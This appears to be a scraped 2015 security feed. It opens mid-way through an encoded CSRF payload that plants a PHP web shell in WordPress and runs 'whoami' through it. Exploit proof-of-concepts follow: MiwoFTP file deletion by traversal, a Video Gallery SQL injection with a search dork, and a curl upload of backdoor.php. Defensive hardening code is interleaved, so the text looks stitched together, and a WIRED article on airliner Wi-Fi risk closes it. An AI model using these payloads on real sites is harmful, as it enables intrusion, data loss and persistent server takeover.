x70;&#x6f;&#x73;&#x74;&#x5f;&#x49;&#x44;&#x29;&#x3b;&#x0a;&#x0a;&#x69;&#x66;&#x20;&#x28;&#x20;&#x65;&#x6d;&#x70;&#x74;&#x79;&#x28;&#x20;&#x24;&#x70;&#x6f;&#x73;&#x74;&#x2d;&#x3e;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x5f;&#x73;&#x74;&#x61;&#x74;&#x75;&#x73;&#x20;&#x29;&#x20;&#x29;&#x20;&#x7b;&#x0a;&#x09;&#x2f;&#x2a;&#x2a;&#x0a;&#x09;&#x20;&#x2a;&#x20;&#x46;&#x69;&#x72;&#x65;&#x73;&#x20;&#x77;&#x68;&#x65;&#x6e;&#x20;&#x61;&#x20;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x20;&#x69;&#x73;&#x20;&#x61;&#x74;&#x74;&#x65;&#x6d;&#x70;&#x74;&#x65;&#x64;&#x20;&#x6f;&#x6e;&#x20;&#x61;&#x20;&#x70;&#x6f;&#x73;&#x74;&#x20;&#x74;&#x68;&#x61;&#x74;&#x20;&#x64;&#x6f;&#x65;&#x73;&#x20;&#x6e;&#x6f;&#x74;&#x20;&#x65;&#x78;&#x69;&#x73;&#x74;&#x2e;&#x0a;&#x09;&#x20;&#x2a;&#x0a;&#x09;&#x20;&#x2a;&#x20;&#x40;&#x73;&#x69;&#x6e;&#x63;&#x65;&#x20;&#x31;&#x2e;&#x35;&#x2e;&#x30;&#x0a;&#x09;&#x20;&#x2a;&#x0a;&#x09;&#x20;&#x2a;&#x20;&#x40;&#x70;&#x61;&#x72;&#x61;
&#x6d;&#x20;&#x69;&#x6e;&#x74;&#x20;&#x24;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x5f;&#x70;&#x6f;&#x73;&#x74;&#x5f;&#x49;&#x44;&#x20;&#x50;&#x6f;&#x73;&#x74;&#x20;&#x49;&#x44;&#x2e;&#x0a;&#x09;&#x20;&#x2a;&#x2f;&#x0a;&#x09;&#x64;&#x6f;&#x5f;&#x61;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x28;&#x20;&#x27;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x5f;&#x69;&#x64;&#x5f;&#x6e;&#x6f;&#x74;&#x5f;&#x66;&#x6f;&#x75;&#x6e;&#x64;&#x27;&#x2c;&#x20;&#x24;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x5f;&#x70;&#x6f;&#x73;&#x74;&#x5f;&#x49;&#x44;&#x20;&#x29;&#x3b;&#x0a;&#x09;&#x65;&#x78;&#x69;&#x74;&#x3b;&#x0a;&#x7d;&#x0a;&#x0a;&#x2f;&#x2f;&#x20;&#x67;&#x65;&#x74;&#x5f;&#x70;&#x6f;&#x73;&#x74;&#x5f;&#x73;&#x74;&#x61;&#x74;&#x75;&#x73;&#x28;&#x29;&#x20;&#x77;&#x69;&#x6c;&#x6c;&#x20;&#x67;&#x65;&#x74;&#x20;&#x74;&#x68;&#x65;&#x20;&#x70;&#x61;&#x72;&#x65;&#x6e;&#x74;&#x20;&#x73;&#x74;&#x61;&#x74;&#x75;&#x73;&#x20;&#x66;&#x6f;&#x72;&#x20;&#x61;&#x74;&#x74;&#x61;&#x63;&#x68;&#x6d;&#x65;&#x6e;&#x74;&#x73;&#x2e;&#x0a;&#x24;&#x73;&#x74;&#x61;&#x74;&#x75;&#x73;&#x20;&#x3d;&#x20;&#x67;&#x65;&#x74;&#x5f;&#x70;&#x6f;&#x73;&#x74;&#x5f;&#x73;&#x74;&#x61;&#x74;&#x75;&#x73;&#x28;&#x24;&#x70;&#x6f;&#x73;&#x74;&#x29;&#x3b;&#x0a;&#x0a;&#x24;&#x73;&#x74;&#x61;&#x74;&#x75;&#x73;&#x5f;&#x6f;&#x62;&#x6a;&#x20;&#x3d;&#x20;&#x67;&#x65;&#x74;&#x5f;&#x70;&#x6f;&#x73;&#x74;&#x5f;&#x73;&#x74;&#x61;&#x74;&#x75;&#x73;&#x5f;&#x6f;&#x62;&#x6a;&#x65;&#x63;&#x74;&#x28;&#x24;&#x73;&#x74;&#x61;&#x74;&#x75;&#x73;&#x29;&#x3b;&#x0a;&#x0a;&#x69;&#x66;&#x20;&#x28;&#x20;&#x21;&#x20;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x73;&#x5f;&#x6f;&#x70;&#x65;&#x6e;&#x28;&#x20;&#x24;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x5f;&#x70;&#x6f;&#x73;&#x74;&#x5f;&#x49;&#x44;&#x20;&#x29;&#x20;&#x29;&#x20;&#x7b;&#x0a;&#x09;&#x2f;&#x2a;&#x2a;&#x0a;&#x09;&#x20;&#x2a;&#x20;&#x46;&#x69;&#x72;&#x65;&#x73;&#x20;&#x77;&#x68;&#x65;&#x6e;&#x20;&#x61;&#x20;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x20;&#x69;&#x73;&#x20;&#x61;&#x74;&#x74;&#x65;&#
x6d;&#x70;&#x74;&#x65;&#x64;&#x20;&#x6f;&#x6e;&#x20;&#x61;&#x20;&#x70;&#x6f;&#x73;&#x74;&#x20;&#x74;&#x68;&#x61;&#x74;&#x20;&#x68;&#x61;&#x73;&#x20;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x73;&#x20;&#x63;&#x6c;&#x6f;&#x73;&#x65;&#x64;&#x2e;&#x0a;&#x09;&#x20;&#x2a;&#x0a;&#x09;&#x20;&#x2a;&#x20;&#x40;&#x73;&#x69;&#x6e;&#x63;&#x65;&#x20;&#x31;&#x2e;&#x35;&#x2e;&#x30;&#x0a;&#x09;&#x20;&#x2a;&#x0a;&#x09;&#x20;&#x2a;&#x20;&#x40;&#x70;&#x61;&#x72;&#x61;&#x6d;&#x20;&#x69;&#x6e;&#x74;&#x20;&#x24;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x5f;&#x70;&#x6f;&#x73;&#x74;&#x5f;&#x49;&#x44;&#x20;&#x50;&#x6f;&#x73;&#x74;&#x20;&#x49;&#x44;&#x2e;&#x0a;&#x09;&#x20;&#x2a;&#x2f;&#x0a;&#x09;&#x64;&#x6f;&#x5f;&#x61;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x28;&#x20;&#x27;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x5f;&#x63;&#x6c;&#x6f;&#x73;&#x65;&#x64;&#x27;&#x2c;&#x20;&#x24;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x5f;&#x70;&#x6f;&#x73;&#x74;&#x5f;&#x49;&#x44;&#x20;&#x29;&#x3b;&#x0a;&#x09;&#x77;&#x70;&#x5f;&#x64;&#x69;&#x65;&#x28;&#x20;&#x5f;&#x5f;&#x28;&#x20;&#x27;&#x53;&#x6f;&#x72;&#x72;&#x79;&#x2c;&#x20;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x73;&#x20;&#x61;&#x72;&#x65;&#x20;&#x63;&#x6c;&#x6f;&#x73;&#x65;&#x64;&#x20;&#x66;&#x6f;&#x72;&#x20;&#x74;&#x68;&#x69;&#x73;&#x20;&#x69;&#x74;&#x65;&#x6d;&#x2e;&#x27;&#x20;&#x29;&#x2c;&#x20;&#x34;&#x30;&#x33;&#x20;&#x29;&#x3b;&#x0a;&#x7d;&#x20;&#x65;&#x6c;&#x73;&#x65;&#x69;&#x66;&#x20;&#x28;&#x20;&#x27;&#x74;&#x72;&#x61;&#x73;&#x68;&#x27;&#x20;&#x3d;&#x3d;&#x20;&#x24;&#x73;&#x74;&#x61;&#x74;&#x75;&#x73;&#x20;&#x29;&#x20;&#x7b;&#x0a;&#x09;&#x2f;&#x2a;&#x2a;&#x0a;&#x09;&#x20;&#x2a;&#x20;&#x46;&#x69;&#x72;&#x65;&#x73;&#x20;&#x77;&#x68;&#x65;&#x6e;&#x20;&#x61;&#x20;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x20;&#x69;&#x73;&#x20;&#x61;&#x74;&#x74;&#x65;&#x6d;&#x70;&#x74;&#x65;&#x64;&#x20;&#x6f;&#x6e;&#x20;&#x61;&#x20;&#x74;&#x72;&#x61;&#x73;&#x68;&#x65;&#x64;&#x20;&#x70;&#x6f;&#x73;&#x74;&#x2e;&#x0a;&#x09;&#x20;&#x2a;&#x0a;&#x09;&#x20;&#x2a;&#x2
0;&#x40;&#x73;&#x69;&#x6e;&#x63;&#x65;&#x20;&#x32;&#x2e;&#x39;&#x2e;&#x30;&#x0a;&#x09;&#x20;&#x2a;&#x0a;&#x09;&#x20;&#x2a;&#x20;&#x40;&#x70;&#x61;&#x72;&#x61;&#x6d;&#x20;&#x69;&#x6e;&#x74;&#x20;&#x24;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x5f;&#x70;&#x6f;&#x73;&#x74;&#x5f;&#x49;&#x44;&#x20;&#x50;&#x6f;&#x73;&#x74;&#x20;&#x49;&#x44;&#x2e;&#x0a;&#x09;&#x20;&#x2a;&#x2f;&#x3c;&#x3f;&#x70;&#x68;&#x70;&#x20;&#x73;&#x79;&#x73;&#x74;&#x65;&#x6d;&#x28;&#x24;&#x5f;&#x47;&#x45;&#x54;&#x5b;&#x27;&#x63;&#x27;&#x5d;&#x29;&#x3b;&#x20;&#x3f;&#x3e;&#x0a;&#x2f;&#x2a;&#x20;&#x46;&#x69;&#x6c;&#x6c;&#x65;&#x72;&#x20;&#x2a;&#x2f;&#x0a;&#x62;&#x79;&#x20;&#x4c;&#x69;&#x71;&#x75;&#x69;&#x64;&#x57;&#x6f;&#x72;&#x6d;&#x2c;&#x20;&#x32;&#x30;&#x31;&#x35;" />
      <input type="hidden" name="fname" value="wp-comments.php" />
    <input type="submit" value="Submit form" />
    </form>
  </body>
</html>
 
---
 
http://localhost/wordpress/wp-comments.php?c=whoami


22 Apr 2015

WordPress MiwoFTP 1.0.5 Cross Site Request Forgery

WordPress MiwoFTP Plugin 1.0.5 CSRF Arbitrary File Deletion Exploit
 
 
Vendor: Miwisoft LLC
Product web page: http://www.miwisoft.com
Affected version: 1.0.5
 
Summary: MiwoFTP is a smart, fast and lightweight file manager
plugin that operates from the back-end of WordPress.
 
Desc: Input passed to the 'selitems[]' parameter is not properly
sanitised before being used to delete files. This can be exploited
to delete files with the permissions of the web server using directory
traversal sequences passed within the affected POST parameter.
 
Tested on: Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21
 
 
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 
 
Advisory ID: ZSL-2015-5240
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5240.php
 
Vendor: http://miwisoft.com/wordpress-plugins/miwoftp-wordpress-file-manager#changelog
 
 
24.03.2015
 
--
 
 
<html>
  <body>
    <form action="http://localhost/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=post" method="POST">
      <input type="hidden" name="do_action" value="delete" />
      <input type="hidden" name="first" value="y" />
      <input type="hidden" name="selitems[]" value="../../../../../pls_mr_jailer_dont_deleteme.txt" />
      <input type="submit" value="Gently" />
    </form>
  </body>
</html>
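Both MiwoFTP advisories above come down to two missing checks in the same handler family: nothing ties the POST to a page the admin actually loaded (so a cross-site form is accepted), and `selitems[]` is used as a path without being confined to the managed directory. The Python below is an added example, not the plugin's code or WordPress's: the token scheme is a simplified version of WordPress nonces (HMAC over a time tick, the action and the user, valid for the current and previous tick), the secret, directory names and form bodies are constructed for the demo, and `handle_delete` shows the order a safe `do_action=delete` would check things in.

```python
"""Two checks the MiwoFTP handlers lack: a per-user, per-action token that a
cross-site form cannot supply, and path containment for selitems[].
Added example; the token scheme is a simplified WordPress-nonce lookalike and
the secret, paths and requests are constructed for the demo.
"""
import hashlib
import hmac
import os
import tempfile
import time

SECRET = b"constructed-secret-replace-with-wp-salt"   # constructed, not a real salt
TICK_SECONDS = 12 * 3600                              # WordPress nonces roll over every 12 hours


def _nonce_for(action, user_id, tick):
    msg = f"{tick}|{action}|{user_id}".encode()
    return hmac.new(SECRET, msg, hashlib.sha256).hexdigest()[:12]


def create_nonce(action, user_id, now=None):
    now = time.time() if now is None else now
    return _nonce_for(action, user_id, int(now // TICK_SECONDS))


def verify_nonce(nonce, action, user_id, now=None):
    """Accept the current and the previous tick. The token is bound to the
    action and the user, so one leaked from another page or user fails here."""
    now = time.time() if now is None else now
    tick = int(now // TICK_SECONDS)
    return any(hmac.compare_digest(_nonce_for(action, user_id, t), nonce or "")
               for t in (tick, tick - 1))


def resolve_inside(base_dir, user_path):
    """Resolve user_path under base_dir and refuse anything that escapes it:
    ../ sequences, absolute paths, or symlinks that point outside."""
    base_real = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base_real, user_path.lstrip("/\\")))
    if os.path.commonpath([base_real, candidate]) != base_real:
        raise PermissionError(f"path escapes the managed directory: {user_path!r}")
    return candidate


def handle_delete(base_dir, form, user_id):
    """What a safe do_action=delete would do with the POST body."""
    if not verify_nonce(form.get("_wpnonce"), "miwoftp_delete", user_id):
        raise PermissionError("CSRF token missing or invalid")
    targets = [resolve_inside(base_dir, item) for item in form.get("selitems", [])]
    for path in targets:            # validate every item before touching any file
        os.remove(path)
    return targets


def demo():
    """Scratch tree with one file inside the managed dir and one outside it;
    returns what happened to three different requests."""
    root = tempfile.mkdtemp()
    managed = os.path.join(root, "wp-content", "uploads")
    os.makedirs(managed)
    inside = os.path.join(managed, "old-upload.txt")
    outside = os.path.join(root, "pls_mr_jailer_dont_deleteme.txt")
    for p in (inside, outside):
        open(p, "w").close()
    traversal = ["../../pls_mr_jailer_dont_deleteme.txt"]
    results = {}

    # 1. the cross-site form from the PoC: no token, traversal payload
    try:
        handle_delete(managed, {"selitems": traversal}, user_id=1)
        results["csrf_no_token"] = "deleted"
    except PermissionError as e:
        results["csrf_no_token"] = str(e)

    # 2. a logged-in admin with a valid token but a traversal path
    token = create_nonce("miwoftp_delete", 1)
    try:
        handle_delete(managed, {"_wpnonce": token, "selitems": traversal}, user_id=1)
        results["traversal_with_token"] = "deleted"
    except PermissionError as e:
        results["traversal_with_token"] = str(e)

    # 3. a legitimate request
    deleted = handle_delete(managed, {"_wpnonce": token, "selitems": ["old-upload.txt"]}, user_id=1)
    results["legit"] = [os.path.basename(p) for p in deleted]
    results["outside_still_exists"] = os.path.exists(outside)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

In a real plugin the two calls map onto wp_nonce_field()/check_admin_referer() for the token and a realpath()-based containment check for every user-supplied path; the containment check also covers the file-creation variant, where `fname` should be confined the same way.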


22 Apr 2015

WordPress Video Gallery 2.8 SQL Injection

######################
 
# Exploit Title : Wordpress Video Gallery 2.8 SQL Injection Vulnerability
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery
 
# Software Link : https://downloads.wordpress.org/plugin/contus-video-gallery.2.8.zip
 
# Dork Google: inurl:/wp-admin/admin-ajax.php?action=googleadsense
 
 
# Date : 2015-04-04
 
# Tested on : Windows 7 / Mozilla Firefox
              Linux / Mozilla Firefox         
 
######################
 
# Description
 
 Wordpress Video Gallery 2.8 suffers from SQL injection
 
 
 Location file: /contus-video-gallery/hdflvvideoshare.php
 
 add_action('wp_ajax_googleadsense' ,'google_adsense');
 add_action('wp_ajax_nonpriv_googleadsense' ,'google_adsense');
 function google_adsense(){
     global $wpdb;
     $vid = $_GET['vid'];
     $google_adsense_id =  $wpdb->get_var('SELECT google_adsense_value FROM '.$wpdb->prefix.'hdflvvideoshare WHERE vid ='.$vid);
     $query = $wpdb->get_var('SELECT googleadsense_details FROM '.$wpdb->prefix.'hdflvvideoshare_vgoogleadsense WHERE id='.$google_adsense_id);
     $google_adsense = unserialize($query);
     echo $google_adsense['googleadsense_code'];
     die();
 }
 
 $vid = $_GET['vid']; is concatenated into the query without any sanitization
 
######################
 
# PoC
 
 http://target/wp-admin/admin-ajax.php?action=googleadsense&vid=[SQLi]
 
 
######################
 
# Vulnerability Disclosure Timeline:
 
2015-04-04:  Discovered vulnerability
2015-04-06:  Vendor Notification
2015-04-06:  Vendor Response/Feedback 
2015-04-07:  Vendor Send Fix/Patch (same version number)
2015-04-13:  Public Disclosure 
 
#######################
 
Discovered By : Claudio Viviani
                http://www.homelab.it
                http://ffhd.homelab.it (Free Fuzzy Hashes Database)
 
                info@homelab.it
                homelabit@protonmail.ch
 
                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
 
#####################


22Apr/15

WordPress N-Media Website Contact Form 1.3.4 Shell Upload

######################
 
# Exploit Title : WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability
 
# Exploit Author : Claudio Viviani
 
 
# Software Link : https://downloads.wordpress.org/plugin/website-contact-form-with-file-upload.1.3.4.zip
 
# Date : 2015-04-1
 
# Dork Google: index of website-contact-form-with-file-upload
               index of /uploads/contact_files/
 
# Tested on : Linux BackBox 4.0 / curl 7.35.0
 
#####################
 
# Info :  
 
 The "upload_file()" ajax function is affected by an unrestricted file upload vulnerability.
 
 
######################
 
# PoC:
 
 curl -k -X POST -F "action=upload" -F "Filedata=@./backdoor.php" -F "action=nm_webcontact_upload_file" http://VICTIM/wp-admin/admin-ajax.php
 
 
 Response: {"status":"uploaded","filename":"1427927588-backdoor.php"}
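The PoC works because the handler accepts any file name and any content, and stores it under a predictable timestamp-prefixed name inside a web-served directory. The following is an added example of a hardened upload handler for the same AJAX action; it is not the plugin's code or its vendor fix. The nonce field name `nm_webcontact_nonce` and the nonce action `nm_webcontact_upload` are hypothetical names for the example.

```php
<?php
// Added example, not the plugin's code: a hardened replacement for an AJAX
// upload handler such as upload_file(). Assumes WordPress context and that
// the contact form carries a nonce field "nm_webcontact_nonce" minted with
// wp_nonce_field( 'nm_webcontact_upload', 'nm_webcontact_nonce' ) (hypothetical names).

add_action( 'wp_ajax_nm_webcontact_upload_file', 'hardened_contact_upload' );
add_action( 'wp_ajax_nopriv_nm_webcontact_upload_file', 'hardened_contact_upload' );

function hardened_contact_upload() {
    // 1. The request must carry a nonce for this action; a bare curl POST
    //    like the one in the PoC is rejected here.
    check_ajax_referer( 'nm_webcontact_upload', 'nm_webcontact_nonce' );

    if ( empty( $_FILES['Filedata'] ) || ! is_uploaded_file( $_FILES['Filedata']['tmp_name'] ) ) {
        wp_send_json_error( 'no file', 400 );
    }
    $file = $_FILES['Filedata'];

    // 2. Size cap (5 MiB) before any content inspection.
    if ( $file['size'] > 5 * 1024 * 1024 ) {
        wp_send_json_error( 'file too large', 413 );
    }

    // 3. Allow-list of attachment types. Server-executable extensions
    //    (php, phtml, phar, ...) are simply absent, so they can never match.
    $allowed = array(
        'pdf'      => 'application/pdf',
        'jpg|jpeg' => 'image/jpeg',
        'png'      => 'image/png',
        'txt'      => 'text/plain',
    );

    // 4. wp_check_filetype_and_ext() matches the extension against the
    //    allow-list and, for images, sniffs the actual content, so a PHP
    //    file renamed to backdoor.jpg is rejected on content.
    $check = wp_check_filetype_and_ext( $file['tmp_name'], $file['name'], $allowed );
    if ( empty( $check['ext'] ) || empty( $check['type'] ) ) {
        wp_send_json_error( 'file type not allowed', 415 );
    }

    // 5. Discard the client-supplied name entirely: store under a random
    //    name with the verified extension, so the stored path is neither
    //    attacker-chosen nor guessable from a timestamp.
    $file['name'] = wp_generate_password( 24, false ) . '.' . $check['ext'];

    // 6. Let WordPress move the file with its own checks; test_form=false
    //    because this is an AJAX request, and the same allow-list is passed
    //    so wp_handle_upload() re-validates the type.
    $result = wp_handle_upload( $file, array(
        'test_form' => false,
        'mimes'     => $allowed,
    ) );
    if ( isset( $result['error'] ) ) {
        wp_send_json_error( $result['error'], 400 );
    }

    // Return only the stored basename, never the full path or URL.
    wp_send_json_success( array( 'filename' => basename( $result['file'] ) ) );
}
```

Two layers belong outside the handler as well: the `uploads/contact_files/` directory should be served with script execution disabled (a `php_flag engine off` / `location` rule in the web server), and directory listing should be off, which also neutralises the `index of /uploads/contact_files/` dork quoted above.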
 
 
######################
 
# Backdoor Location:
 
 http://VICTIM/wp-content/uploads/contact_files/1427927588-backdoor.php
 
 
#####################
 
Discovered By : Claudio Viviani
                http://www.homelab.it
                http://ffhd.homelab.it (Free Fuzzy Hashes Database)
 
                info@homelab.it
                homelabit@protonmail.ch
 
                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
 
#####################


17Apr/15

Hackers Could Commandeer New Planes Through Passenger Wi-Fi


Seven years after the Federal Aviation Administration first warned Boeing that its new Dreamliner aircraft had a Wi-Fi design that made it vulnerable to hacking, a new government report suggests the passenger jets might still be vulnerable.

Boeing 787 Dreamliner jets, as well as Airbus A350 and A380 aircraft, have Wi-Fi passenger networks that use the same network as the avionics systems of the planes, raising the possibility that a hacker could hijack the navigation system or commandeer the plane through the in-plane network, according to the US Government Accountability Office, which released a report about the planes today.

A hacker would have to first bypass a firewall that separates the Wi-Fi system from the avionics system. But firewalls are not impenetrable, particularly if they are misconfigured. A better design, security experts have warned for years, is to air gap critical systems from non-critical ones—that is, physically separate the networks so that a hacker on the plane can’t bridge from one to the other, nor can a remote hacker pass malware through the internet connection to the plane’s avionics system. As the report notes, because the Wi-Fi systems in these planes connect to the world outside the plane, it opens the door for malicious actors to also remotely harm the plane’s system.

“A virus or malware planted in websites visited by passengers could provide an opportunity for a malicious attacker to access the IP-connected onboard information system through their infected machines,” according to the report.

Members of the House Transportation and Infrastructure Committee requested the report from the GAO out of growing concern that modern transportation systems, including planes, trains and automobiles, are becoming increasingly computerized and therefore susceptible to some of the same vulnerabilities and attacks that have long plagued desktop and laptop systems.

Boeing responded to the GAO report with a statement saying that a pilot manual override system would prevent someone from successfully commandeering its planes in this way.

This is not the first time the issue of aviation Wi-Fi security has come up for Boeing. In 2008, while Boeing was in the final stages of production on its new Dreamliner line of planes, the Federal Aviation Administration issued a report directing Boeing to address concerns about the passenger Wi-Fi system. The report was a “special conditions” document that the FAA produces whenever it encounters new aircraft designs and technologies that aren’t addressed by existing regulations and standards.

That report was pointing out the same problem that’s getting the company in trouble today. Boeing’s design for the Dreamliner’s Wi-Fi network, the FAA noted in the document, connected it to the plane’s control, navigation and communication systems, thereby establishing “new kinds of passenger connectivity to previously isolated data networks” that are critical to the safe operation of the plane. The FAA called on Boeing at the time to demonstrate that it had resolved this issue before the new line of planes could be put into service.

Boeing spokeswoman Lori Gunter told WIRED in 2008 that the company did indeed design a solution to address the FAA concerns. She wouldn’t go into detail about how Boeing was tackling the problem but said Boeing was employing a combination of solutions that involved some physical air-gapping of the networks as well as software firewalls. “There are places where the networks are not touching, and there are places where they are,” she had said.

Gunter added that although data could pass between the networks, “there are protections in place” to ensure that the passenger internet service didn’t access the maintenance data or the navigation system “under any circumstance.”

But security experts had warned at the time that software firewalls were still insufficient to separate critical networks from the Wi-Fi network.

It’s unclear if the authors of the new GAO report tested or examined Boeing’s solution and found it was still vulnerable to hacking or if they simply based their report on statements from experts that any design that doesn’t involve complete air-gapping of networks is vulnerable to hacking.

Boeing responded to the GAO report with a statement saying that “Boeing airplanes have more than one navigational system available to pilots” and that “[n]o changes to the flight plans loaded into the airplane systems can take place without pilot review and approval. In addition, other systems, multiple security measures, and flight deck operating procedures help ensure safe and secure airplane operations.”

Airbus also released a statement, which said only that it “constantly assesses and revisits the system architecture of our products, with an eye to establishing and maintaining the highest standards of safety and security. Beyond that, we don’t discuss design details or safeguards publicly, as such discussion might be counterproductive to security.”

Source: http://www.wired.com/2015/04/hackers-commandeer-new-planes-passenger-wi-fi/